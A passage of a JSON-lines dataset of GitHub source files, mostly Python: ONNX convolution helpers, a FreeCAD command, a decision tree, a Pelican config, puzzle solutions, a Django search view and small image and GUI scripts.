print(datas)\n\ttry:\n\t\tdb.mycursor.execute(datas)\n\t\tdb.mydb.commit()\n\texcept mysql.connector.Error:\n\t\tprint(\"exception handled\")\n\n\n\n\n\t\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# print(data)\n","repo_name":"eGamingData/crawlers-egamingdata","sub_path":"bin/lol_crawlers/raw_data/raw_data.py","file_name":"raw_data.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"14062302339","text":"num = int(input())\n\ndef hansu(num):\n    ans = 0\n    for i in range(1,num+1):\n        if i <= 99 :\n            ans = ans + 1\n        else :\n            nums = list(map(int, str(i)))\n            if nums[0]-nums[1] == nums[1]-nums[2]:\n                ans = ans + 1\n\n    return ans\n\nprint(hansu(num))\n    ","repo_name":"ssong915/Algorithm-PS","sub_path":"BOJ/Level6/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"29132986993","text":"from __future__ import division\nfrom __future__ import 
print_function\n\nimport logging\n\nfrom math import floor, ceil\nfrom copy import copy\nfrom typing import Tuple, List\n\nfrom ngraph_onnx import TYPE_CHECKING\n\nfrom ngraph.impl import Node as NgraphNode\n\nimport ngraph as ng\n\nfrom ngraph.utils.types import get_dtype\n\nlog = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from ngraph_onnx.onnx_importer.model_wrappers import NodeWrapper\n\n\ndef get_pads(onnx_node, kernel_shape=None):\n # type: (NodeWrapper, List[int]) -> Tuple[List[int], List[int]]\n \"\"\"\n Get padding values for the operation described by an ONNX node.\n\n If `auto_pad` attribute is specified as SAME_UPPER or SAME_LOWER, or VALID values are\n calculated. Otherwise values are taken from the `pads` attribute.\n\n `pads` value should follow [x1_begin, x2_begin..., x1_end, x2_end,...]\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels to pad (height, width, depth)\n \"\"\"\n auto_pad = onnx_node.get_attribute_value('auto_pad')\n pads = onnx_node.get_attribute_value('pads', ()) # Padding along each axis\n if(kernel_shape is None):\n kernel_shape = get_kernel_shape(onnx_node)\n\n if len(pads) == 0:\n pads = [0] * len(kernel_shape)\n\n # Attribute 'auto_pad' is deprecated, but is currently used by CNTK.\n if auto_pad == 'VALID':\n pads = [0, 0] * len(kernel_shape)\n\n elif auto_pad == 'SAME_UPPER' or auto_pad == 'SAME_LOWER':\n # SAME_UPPER or SAME_LOWER mean pad the input so that the output size match the input.\n # In case of odd number add the extra padding at the end for SAME_UPPER and at the\n # beginning for SAME_LOWER.\n def pad_value(kernel_dim): # type: (int) -> float\n return (kernel_dim - 1.0) / 2.0\n\n pads_starts = [floor(pad_value(dim)) if auto_pad == 'SAME_UPPER' else\n ceil(pad_value(dim)) for dim in kernel_shape]\n pads_ends = [ceil(pad_value(dim)) if auto_pad == 'SAME_UPPER' else\n floor(pad_value(dim)) for dim in kernel_shape]\n pads = pads_starts + pads_ends\n\n if len(pads) <= 3:\n padding_above = pads\n padding_below = pads\n else:\n padding_above = pads[:len(pads) // 2]\n padding_below = pads[len(pads) // 2:]\n\n return padding_above, padding_below\n\n\ndef get_kernel_shape(onnx_node): # type: (NodeWrapper) -> List[int]\n \"\"\"\n Get shape of kernel (filter) in pixels.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers representing kernel shape (height, width, depth)\n \"\"\"\n kernel_shape = onnx_node.get_attribute_value('kernel_shape', ())\n\n if len(kernel_shape) == 0:\n kernel_shape = [1, 1]\n\n return kernel_shape\n\n\ndef get_strides(onnx_node, kernel_shape=None): # type: (NodeWrapper, List[int]) -> List[int]\n \"\"\"\n Get number of pixels to stride operation by in each direction.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels to stride by (height, width, depth)\n \"\"\"\n strides = onnx_node.get_attribute_value('strides', ()) # stride along each axis\n if kernel_shape is None:\n kernel_shape = get_kernel_shape(onnx_node)\n\n if len(strides) == 0:\n strides = [1] * len(kernel_shape)\n\n return strides\n\n\ndef get_dilations(onnx_node): # type: (NodeWrapper) -> List[int]\n \"\"\"\n Get number of pixels for filter dilation in each direction.\n\n :param onnx_node: wrapped ONNX node for Conv or Pool operation\n :return: tuple of numbers of pixels for filter dilation (height, width, depth)\n \"\"\"\n dilations = onnx_node.get_attribute_value('dilations', ()) # dilation along each axis\n 
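# the kernel shape is only needed here to know how many spatial axes get the default dilation of 1\n    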
kernel_shape = get_kernel_shape(onnx_node)\n\n if len(dilations) == 0:\n dilations = [1] * len(kernel_shape)\n\n return dilations\n\n\ndef make_convolution_op(onnx_node, ng_inputs):\n # type: (NodeWrapper, List[NgraphNode]) -> NgraphNode\n \"\"\"\n Create an ngraph convolution Op based on an ONNX node.\n\n :param onnx_node: wrapped ONNX node for Conv of ConvTranspose op\n :param ng_inputs: ngraph TensorOp input tensors\n :return: ngraph Op for convolution or deconvolution\n \"\"\"\n if len(ng_inputs) == 3:\n data, weights, bias = ng_inputs\n elif len(ng_inputs) == 2:\n data, weights = ng_inputs\n bias = ng.constant(0, dtype=get_dtype(data.get_element_type()))\n else:\n raise ValueError('Conv node (%s): unexpected number of input values: %d.',\n onnx_node.name, len(ng_inputs))\n\n groups = onnx_node.get_attribute_value('group', 1)\n\n strides = get_strides(onnx_node)\n dilation = get_dilations(onnx_node)\n padding_below, padding_above = get_pads(onnx_node)\n if groups != 1:\n # Split one convolution op to N ops where N is the number of groups and concat results after computation.\n # reference: https://github.com/NervanaSystems/ngraph-mxnet/blob/fdd692/src/ngraph/ngraph_emitter.cc#L822-L856\n data_shape = list(data.shape)\n weights_shape = list(weights.shape)\n convolutions_nodes = []\n\n # initial bounds for splice\n data_lower_part = len(data_shape) * [0]\n data_upper_part = copy(data_shape)\n\n weights_lower_part = len(weights_shape) * [0]\n weights_upper_part = copy(weights_shape)\n\n for group in range(groups):\n # update bounds for splice\n data_lower_part[1] = group * int((data_shape[1] / groups))\n data_upper_part[1] = (group + 1) * int((data_shape[1] / groups))\n\n sliced_data = ng.slice(data, data_lower_part, data_upper_part)\n\n # update bounds for splice\n weights_lower_part[0] = group * int((weights_shape[0] / groups))\n weights_upper_part[0] = max((group + 1) * int((weights_shape[0] / groups)), 1)\n\n sliced_weights = ng.slice(weights, weights_lower_part, weights_upper_part)\n convolutions_nodes.append(ng.convolution(sliced_data, sliced_weights, strides,\n dilation, padding_below, padding_above))\n conv = ng.concat(convolutions_nodes, axis=1)\n else:\n conv = ng.convolution(data, weights, strides, dilation, padding_below, padding_above)\n if len(bias.shape) > 0:\n return conv + ng.broadcast_to(bias, conv.shape, 1)\n else:\n return conv\n","repo_name":"chilung/dllab-5-1-ngraph","sub_path":"lib/python3.5/site-packages/ngraph_onnx/onnx_importer/utils/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1954273557","text":"import FreeCADGui\nimport FreeCAD\n\nfrom .TaskPanel_Functions_Add import FunctionsTaskPanelAdd\n\nfrom .Interface_Checks import isOpticalSystemObserver\n\n\nclass CreateFunctionTool:\n \"Tool for creating function object\"\n\n def GetResources(self):\n return {\"Pixmap\": \":/icons/pyrate_func_icon.svg\",\n \"MenuText\": \"Create function ...\",\n \"Accel\": \"\",\n \"ToolTip\": \"Generates function object in document\"\n }\n\n def IsActive(self):\n if FreeCAD.ActiveDocument is None:\n return False\n else:\n return True\n\n def Activated(self):\n\n doc = FreeCAD.ActiveDocument\n\n osobservers = []\n for obj in doc.Objects:\n if isOpticalSystemObserver(obj):\n osobservers.append(obj)\n\n panel = FunctionsTaskPanelAdd(doc, [oso.Label for oso in osobservers])\n 
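# hand the assembled task panel to FreeCAD's control area so the dialog is shown\n        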
FreeCADGui.Control.showDialog(panel)\n\n\nFreeCADGui.addCommand('CreateFunctionsCommand', CreateFunctionTool())\n","repo_name":"mess42/pyrate","sub_path":"freecad/PyrateWorkbench/Commands_Functions.py","file_name":"Commands_Functions.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"73"} +{"seq_id":"23764919903","text":"import tkinter as tk\r\nfrom textblob import TextBlob\r\nfrom cleaner import *\r\n\r\ndef handle_click():\r\n user_input = text_box.get(\"1.0\",\"end-1c\")\r\n # blob = TextBlob(user_input)\r\n # sentiment = \"positive\" if blob.sentiment.polarity>0 else \"negative\"\r\n sentiment = check_sentiment(user_input)\r\n if sentiment==\"positive\":\r\n result_label.config(text=f'Review is {sentiment}',fg=\"white\",bg=\"green\")\r\n else:\r\n result_label.config(text=f'Review is {sentiment}',fg=\"white\",bg=\"red\")\r\n \r\n\r\nwindow = tk.Tk()\r\nwindow.title(\"Sentiment analysis\")\r\n\r\ntext_label = tk.Label(window,text=\"Write or paste your review here\")\r\ntext_label.pack(pady=10)\r\n\r\ntext_box = tk.Text(window,width=50,height=15)\r\ntext_box.pack(pady=10,fill=tk.BOTH, expand=True)\r\n\r\nresult_label = tk.Label(window, text=\"\")\r\nresult_label.pack(padx=5)\r\n\r\ncheck_button = tk.Button(window, text=\"Check sentiment analysis\", command=handle_click, cursor=\"hand2\",fg=\"white\",bg=\"black\")\r\ncheck_button.pack(pady=10)\r\n\r\nwindow.mainloop()","repo_name":"Jula143/Sentyment-analysis","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42224641333","text":"from dataAccess.FlightRepository import FilghtRepository\nfrom common.entities.db_config import local_session, create_all_entities\nfrom common.entities.db_conifg_procedured import load_db_scripts\nfrom common.entities.Customer import Customer\nfrom common.entities.Flight import Flight\nfrom common.entities.Ticket import Ticket\nimport random\nimport math\nimport datetime\n\nfrom sqlalchemy import func\n\nITERATIONS = 5000\n\nseats_models = [\n {'seats' : 120, 'rows': 20, 'cols': 6},\n {'seats' : 180, 'rows': 30, 'cols': 6},\n {'seats' : 200, 'rows': 25, 'cols': 8},\n {'seats' : 240, 'rows': 24, 'cols': 10},\n {'seats' : 300, 'rows': 30, 'cols': 10}\n]\n\nclass generate_tickets_bank:\n def __init__(self):\n create_all_entities()\n load_db_scripts()\n self.repository = FilghtRepository(local_session)\n\n def generate(self):\n customers = self.repository.get_all(Customer)\n customer_count = len(customers)\n\n #flights\n # start_date = datetime.datetime(2022, 9, 1)\n # end_date = datetime.datetime(2022, 9, 30)\n # flight_condition = (lambda query: query.filter(Flight.departure_time >=start_date,\n # Flight.departure_time <=end_date))\n flights = self.repository.get_all(Flight)\n flights_count = len(flights)\n\n for i in range(5000):\n # get random customer\n customer_index = math.floor(random.random() * customer_count)\n customer = customers[customer_index]\n\n # get random flight\n # primary key (flight, customer) mustn't be violated\n # flight only with remaining_tickets >0\n # no customer cross flights\n while True:\n flight_index = math.floor(random.random() * flights_count)\n flight = flights[flight_index]\n db_flight = self.repository.get_by_id(Flight, flight.id)\n if db_flight.remaining_tickets == 0:\n continue\n flight_customer_condition = (lambda query: 
query.filter(Ticket.flight_id == db_flight.id,\n Ticket.customer_id == customer.id))\n flight_customer_tickets = self.repository.get_all_by_condition(Ticket, flight_customer_condition)\n if len(flight_customer_tickets) >0:\n continue\n db_cross_flights = self.repository.get_customer_cross_flight(customer.id, db_flight.id)\n if len(db_cross_flights) > 0:\n continue\n break\n # flight matched\n model = self.get_seats_model(db_flight.num_seats)\n\n # get position\n while True:\n row_count = model['rows']\n columns_count = model['cols']\n random_row = math.floor(random.random() * row_count)\n random_col = math.floor(random.random() * columns_count)\n format_position = f'{random_row + 1}-{random_col + 1}'\n\n ticket_pos_condition = (lambda query: query.filter(Ticket.flight_id == db_flight.id,\n Ticket.position == format_position))\n match_position_ticket = self.repository.get_all_by_condition(Ticket, ticket_pos_condition)\n is_match_ticket = len(match_position_ticket) == 0\n if is_match_ticket:\n break\n\n # postion selected\n # insert new ticket\n ticket_price = db_flight.price\n new_ticket = Ticket(flight_id=db_flight.id,\n customer_id=customer.id,\n position=format_position,\n price=ticket_price)\n\n remaining_tickets = db_flight.remaining_tickets - 1\n self.repository.add_ticket(new_ticket, remaining_tickets)\n\n print(f'Inseted Num {i}')\n\n def get_seats_model(self, num_seats):\n for model in seats_models:\n if model['seats'] == num_seats:\n return model\n return None\n\nbank = generate_tickets_bank()\nbank.generate()\n\nprint('Done! ')","repo_name":"danielMarmor/FlightRepositoryProject","sub_path":"dbGenerator/genrate_tickets_bank.py","file_name":"genrate_tickets_bank.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34933458271","text":"import numpy as np\nimport utils as Util\n\nclass DecisionTree():\n def __init__(self):\n self.clf_name = \"DecisionTree\"\n self.root_node = None\n\n def train(self, features, labels):\n # features: List[List[float]], labels: List[int]\n # init\n assert (len(features) > 0)\n num_cls = np.unique(labels).size\n\n # build the tree\n self.root_node = TreeNode(features, labels, num_cls)\n if self.root_node.splittable:\n self.root_node.split()\n\n return\n\n def predict(self, features):\n # features: List[List[any]]\n # return List[int]\n y_pred = []\n for idx, feature in enumerate(features):\n pred = self.root_node.predict(list(feature))\n y_pred.append(pred)\n return y_pred\n\n\nclass TreeNode(object):\n def __init__(self, features, labels, num_cls):\n # features: List[List[any]], labels: List[int], num_cls: int\n self.features = np.array(features)\n self.labels = labels\n self.children = []\n self.num_cls = num_cls\n branch = []\n # find the most common labels in current node\n count_max = 0\n for label in np.unique(labels):\n branch.append(self.labels.count(label))\n if branch[-1] > count_max:\n count_max = labels.count(label)\n self.cls_max = label\n # splittable is false when all features belongs to one class\n self.entropy = Util.calculate_entropy(branch)\n if len(np.unique(labels)) < 2 or len(self.features[0]) == 0:\n self.splittable = False\n else:\n self.splittable = True\n self.dim_split = None # the index of the feature to be split\n self.feature_uniq_split = None # the possible unique values of the feature to be split\n\n #TODO: try to split current node\n def split(self):\n self.best_info_gain = float('-inf')\n self.best_attribute_values = 
[]\n\n        for attribute_index in range(len(self.features[0])):\n            branch = dict()\n            for attribute_value in sorted(set(self.features[:, attribute_index])):\n                branch[attribute_value] = [0] * self.num_cls\n            label_map = sorted(set(self.labels))\n            for label_index, label in enumerate(self.labels):\n                branch[self.features[label_index, attribute_index]][label_map.index(label)] \\\n                    = branch.get(self.features[label_index, attribute_index], 0)[label_map.index(label)] + 1\n            current_info_gain = Util.Information_Gain(self.entropy, list(branch.values()))\n\n            if (current_info_gain != 0) and ((current_info_gain > self.best_info_gain) or\n                    (current_info_gain == self.best_info_gain and len(branch) > self.feature_uniq_split)):\n                self.best_info_gain = current_info_gain\n                self.dim_split = attribute_index\n                self.feature_uniq_split = len(branch)\n                self.best_attribute_values = list(branch.keys())\n\n        if self.best_info_gain != float('-inf'):\n            # split the best attribute and create children\n            child_feature_array = np.column_stack((self.features[:, :self.dim_split], self.features[:, self.dim_split+1:]))\n            for attribute_value in self.best_attribute_values:\n                subset_of_indices = np.where(self.features[:, self.dim_split] == attribute_value)[0]\n                child_labels = np.array(self.labels)[subset_of_indices].tolist()\n                self.children.append(TreeNode(child_feature_array[subset_of_indices].tolist(), child_labels,\\\n                        len(set(child_labels))))\n                if self.children[-1].splittable:\n                    self.children[-1].split()\n        else:\n            self.splittable = False\n        return\n\n    # TODO: predict the branch or the class\n    def predict(self, feature):\n        # feature: List[any]\n        # return: int\n        if self.splittable and self.dim_split is not None:\n            attribute_value = feature.pop(self.dim_split)\n            return self.children[self.best_attribute_values.index(attribute_value)].predict(feature)\n        else:\n            return self.cls_max\n","repo_name":"Keerthivasan13/CSCI567-Machine_Learning","sub_path":"Decision Tree/hw1_dt.py","file_name":"hw1_dt.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"}
{"seq_id":"35546770282","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Thomas Cole'\nSITENAME = 'Thomas Cole'\n# do we need this on the local site? 
seems links break without it\nSITEURL = 'http://localhost:8000'\n# Save the default index page as blog.html\nINDEX_SAVE_AS = 'blog/index.html'\n\n\n\n###########################################\n# ADDING STUFF TO MAKE MY CUSTOM THEME WORK - URLS and FILENAMES\nARTICLE_URL = '{date:%Y}/{date:%b}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = '{date:%Y}/{date:%b}/{date:%d}/{slug}/index.html'\nPAGE_URL = '{slug}'\nPAGE_SAVE_AS = '{slug}/index.html'\n\n# Make all the remaining URLs use the trailing slash without file extension\n\nARTICLE_LANG_URL = '{slug}-{lang}/'\n# I know these work\nAUTHOR_URL = 'author/{slug}/'\nAUTHOR_SAVE_AS = 'author/{slug}/index.html'\nCATEGORY_URL = 'category/{slug}/'\nCATEGORY_SAVE_AS = 'category/{slug}/index.html'\n\n# Not sure about these\nDRAFT_LANG_URL = 'drafts/{slug}-{lang}/'\nDRAFT_PAGE_LANG_URL = 'drafts/pages/{slug}-{lang}/'\nDRAFT_PAGE_URL = 'drafts/pages/{slug}/'\nDRAFT_URL = 'drafts/{slug}/'\nPAGE_LANG_URL = 'pages/{slug}-{lang}/'\nSTATIC_URL = '{path}/'\n\n# Test these\nTAG_URL = 'tag/{slug}/'\nTAG_SAVE_AS = 'tag/{slug}/index.html'\n\nYEAR_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/index.html'\nMONTH_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/{date:%b}/index.html'\nDAY_ARCHIVE_SAVE_AS = 'archives/{date:%Y}/{date:%b}/{date:%d}/index.html'\n\nYEAR_ARCHIVE_URL = 'archives/{date:%Y}/'\nMONTH_ARCHIVE_URL = 'archives/{date:%Y}/{date:%b}/'\nDAY_ARCHIVE_URL = 'archives/{date:%Y}/{date:%b}/{date:%d}/'\n\nARCHIVES_SAVE_AS = 'archives/index.html'\nARCHIVES_URL = 'archives/'\n\n# additional need to test\n# this should just be a list of all the tags\nTAGS_URL = 'tags/'\nTAGS_SAVE_AS = 'tags/index.html'\n\nAUTHORS_URL = 'authors/'\nAUTHORS_SAVE_AS = 'authors/index.html'\n\nCATEGORYS_URL = 'categories/'\nCATEGORYS_SAVE_AS = 'categories/index.html'\n\n# these seem to work now\nPAGINATION_PATTERNS = (\n(1, '{url}', '{name}{extension}'),\n(2, '{url}/{number}', '{name}{number}{extension}'),\n)\n\n###############################################\n\n\n# my modified theme based on tuxlite_tbs\nTHEME = \"themes/tuxlite_tbs_mod\"\n# display static pages from content/pages/ in the menu\nDISPLAY_PAGES_ON_MENU = False\n# use this list to get custom menu links\nMENUITEMS = (\n ('Home', ''),\n ('Projects', 'projects/'),\n ('Blog', 'blog/'),\n ('Hire Me!', 'contact/' )\n )\n\nPATH = 'content'\n\n# added static paths to get a logo in there and extra\nSTATIC_PATHS = [\n 'images',\n 'extra/favicon.ico',\n 'extra/robots.txt',\n]\n\nEXTRA_PATH_METADATA = {\n 'extra/robots.txt': {'path': 'robots.txt'},\n 'extra/favicon.ico': {'path': 'favicon.ico'}\n}\n\nSITELOGO = '/images/logo-03.svg'\n\nTIMEZONE = 'America/Los_Angeles'\n\nDEFAULT_LANG = 'en'\n\n# disable cache to see changes\nLOAD_CONTENT_CACHE = False\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n)\n\n# Social widget\nSOCIAL = (('GitHub', 'https://github.com/thomasjohncole'),\n ('LinkedIn', 'https://www.linkedin.com/in/thomas-john-cole'),\n ('Twitter', 'https://twitter.com/thomasjohncole'))\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = 
True","repo_name":"thomasjohncole/pelican","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
{"seq_id":"21627142128","text":"import re\n\ndef parseInstructions(instructions):\n output = []\n \n for instruction in instructions:\n parse = re.match(r'(\\w)(\\d+)', instruction)\n output.append((parse.group(1), int(parse.group(2))))\n\n return output\n\ndef part1(instructions):\n x, y = 0, 0\n currentDir = 90 # angle relative to north\n\n for action, amount in instructions:\n if action == 'N':\n y += amount\n elif action == 'S':\n y -= amount\n elif action == 'E':\n x += amount\n elif action == 'W':\n x -= amount\n elif action == 'L':\n currentDir = (currentDir - amount) % 360\n elif action == 'R':\n currentDir = (currentDir + amount) % 360\n elif action == 'F':\n if currentDir == 0:\n y += amount\n elif currentDir == 90:\n x += amount\n elif currentDir == 180:\n y -= amount\n elif currentDir == 270:\n x -= amount\n\n print(abs(x) + abs(y))\n\ndef part2(instructions):\n shipX, shipY = 0, 0\n wayX, wayY = 10, 1 # 10 units east and 1 north\n\n for action, amount in instructions:\n if action == 'N':\n wayY += amount\n elif action == 'S':\n wayY -= amount\n elif action == 'E':\n wayX += amount\n elif action == 'W':\n wayX -= amount\n elif action == 'L':\n for _ in range(amount // 90):\n wayX, wayY = -wayY, wayX\n elif action == 'R':\n for _ in range(amount // 90):\n wayX, wayY = wayY, -wayX\n elif action == 'F':\n for _ in range(amount):\n shipX += wayX\n shipY += wayY\n \n print(abs(shipX) + abs(shipY))\n\ninstructions = [line.strip() for line in open('day12/input.txt', 'r')]\nparsed = parseInstructions(instructions)\npart1(parsed)\npart2(parsed)","repo_name":"jac0bwilson/advent-of-code-2020","sub_path":"day12/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"18120165001","text":"#!/usr/bin/env python3\nimport cv2 as cv\nimport numpy as np\n\ncolors = {}\nfor i in range(1, 50):\n index = i * 256 * 2 / 50\n is_green_blue = index < 256\n saturation = index % 256\n\n colors[i] = (0 if is_green_blue else saturation, saturation if is_green_blue else 255 - saturation, 255 - saturation if is_green_blue else 0)\n\nimage = np.zeros((1000, 1000, 3), dtype=np.uint8)\nfor i in range(10, 500):\n cv.circle(image, (500, 500), i, colors[i//10])\n\ncv.imshow(\"foo\", image)\ncv.waitKey(0)","repo_name":"xialinbo/CvTools","sub_path":"src/_test.py","file_name":"_test.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"21202560606","text":"from rest_framework import generics\nfrom rest_framework.response import Response\n\nfrom products.models import Product\nfrom products.serializers import ProductSerializers\n\n\nclass SearchListView(generics.ListAPIView):\n queryset = Product.objects.all()\n serializer_class = ProductSerializers\n\n def get_queryset(self, *args, **kwargs):\n qs = super().get_queryset(*args, **kwargs)\n q = self.request.GET.get('q') # q is the keyword to search for\n results = Product.objects.none() # none() never hits the database; used when no results are expected\n if q is not None:\n user = None\n if self.request.user.is_authenticated:\n user = self.request.user\n results = qs.search(q, user=user)\n print(results)\n return results\n\n# class SearchListView(generics.GenericAPIView):\n# def get(self, request, *args, **kwargs):\n# user = None\n# if request.user.is_authenticated:\n# user = request.user.username\n# query = request.GET.get('q')\n# public = str(request.GET.get('public')) != \"0\"\n# tag = request.GET.get('tag') or None\n# if not query:\n# return Response('', status=400)\n# results = client.perform_search(query, tags=tag, user=user, public=public)\n# return Response(results)\n","repo_name":"SungMinWoo/Django_RestApi","sub_path":"Django-Rest-Framework-Tutorial/backend/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"27558379617","text":"#!/usr/bin/python3\n\"\"\"\n2. First Rectangle\n\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"\n Rectangle Class\n \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" init - constructor method\n Args:\n id: identification object\n width: width size of an object\n height: height size of an object\n x: displacement in x\n y: displacement in y\n \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter method\n Return:\n self.__width\n \"\"\"\n return self.__width\n\n @width.setter\n def width(self, width):\n \"\"\" width setter method\n Args:\n width: width size of an object\n \"\"\"\n if type(width) != int:\n raise TypeError(\"width must be an integer\")\n if width <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = width\n\n @property\n def height(self):\n \"\"\" height getter method\n Return:\n self.__height\n \"\"\"\n return self.__height\n\n @height.setter\n def height(self, height):\n \"\"\" height setter method\n Args:\n height: height size of an object\n \"\"\"\n if type(height) != int:\n raise TypeError(\"height must be an integer\")\n if height <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = height\n\n @property\n def x(self):\n \"\"\" x getter method\n Return:\n self.__x\n \"\"\"\n return self.__x\n\n @x.setter\n def x(self, x):\n \"\"\" x setter method\n Args:\n x: displacement in x\n \"\"\"\n if type(x) != int:\n raise TypeError(\"x must be an integer\")\n if x < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = x\n\n @property\n def y(self):\n \"\"\" y getter method\n Return:\n self.__y\n \"\"\"\n return self.__y\n\n @y.setter\n def y(self, y):\n \"\"\" y setter method\n Args:\n y: displacement in y\n \"\"\"\n if type(y) != int:\n raise TypeError(\"y must be an integer\")\n if y < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = y\n\n def area(self):\n \"\"\" area method\n Returns:\n the area of the object\n \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" display method\n Returns:\n prints the rectangle using the # character\n \"\"\"\n print(\"\\n\" * self.__y, end=\"\")\n for row in range(self.__height):\n print(\" \" * self.__x, end=\"\")\n for col in range(self.__width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n \"\"\" str method\n Returns: a string class value\n \"\"\"\n return \"[Rectangle] ({}) {:d}/{:d} - {:d}/{:d}\"\\\n .format(self.id, self.x, self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" update method\n Args:\n args: When receives simple args\n kwargs: When receives key value args\n \"\"\"\n if args and args is not None and len(args) != 0:\n for i, arg in enumerate(args):\n if i 
== 0:\n self.id = arg\n elif i == 1:\n self.__width = arg\n elif i == 2:\n self.__height = arg\n elif i == 3:\n self.__x = arg\n elif i == 4:\n self.__y = arg\n elif kwargs and kwargs is not None and len(kwargs) != 0:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n elif key == \"width\":\n self.__width = value\n elif key == \"height\":\n self.__height = value\n elif key == \"x\":\n self.__x = value\n elif key == \"y\":\n self.__y = value\n\n def to_dictionary(self):\n \"\"\" to_dictionary method\n \"\"\"\n return {\"id\": self.id,\n \"width\": self.__width,\n \"height\": self.__height,\n \"x\": self.__x,\n \"y\": self.__y}\n","repo_name":"faykris/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"12120765683","text":"# -*- coding: UTF-8 -*-\r\n\r\nimport re\r\nimport requests\r\nimport codecs\r\nimport sys\r\nimport imghdr\r\nimport os\r\nimport uuid\r\n\r\n\r\ndef get_md_str(file_name):\r\n f = codecs.open(file_name, 'r', 'utf-8')\r\n return f.read()","repo_name_placeholder":""}
'''This is the child class docstring.'''\n ...\n >>> print(Child.__doc__)\n \n This is the child class docstring.\n \n \"\"\"\n\n if obj is None:\n return partial(docmerge, **kwargs)\n\n if isinstance(obj, type):\n cls = obj\n parent = super(cls, cls)\n cls.__doc__ = merge_docstrings(parent.__doc__, cls.__doc__, **kwargs)\n elif callable(obj):\n func = obj\n return _MethodDocMerger(func, **kwargs)\n\n return obj\n\n\nclass _MethodDocMerger:\n def __init__(self, method, **kwargs) -> None:\n self.method = method\n self.kwargs = kwargs\n\n def __set_name__(self, owner, name):\n parent = super(owner, owner)\n parent_method = getattr(parent, name)\n\n self.method.__doc__ = merge_docstrings(\n parent_method.__doc__, self.method.__doc__, **self.kwargs\n )\n setattr(owner, name, self.method)\n","repo_name":"bressanmarcos/docmerge","sub_path":"docmerge/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25851093272","text":"import os, sys\nfrom PIL import Image\n\nsize_75 = (75,75)\ncounter = 1\nos.mkdir('./new_images')\n\nfor f in os.listdir('./images'):\n #outfile = os.path.splitext(f)[0] + \".png\"\n if f.endswith(\".jpg\"):\n # try:\n i = Image.open(f)\n i = i.convert(\"L\")\n i = i.crop((0,0,75,75))\n i = i.transpose(Image.ROTATE_270)\n outfile = \"./new_images/pic\" + str(counter).zfill(4) + \".png\" \n i.save(outfile,\"PNG\")\n counter+=1\n # print(i.size)\n # except IOError:\n # print(\"ERRLIN 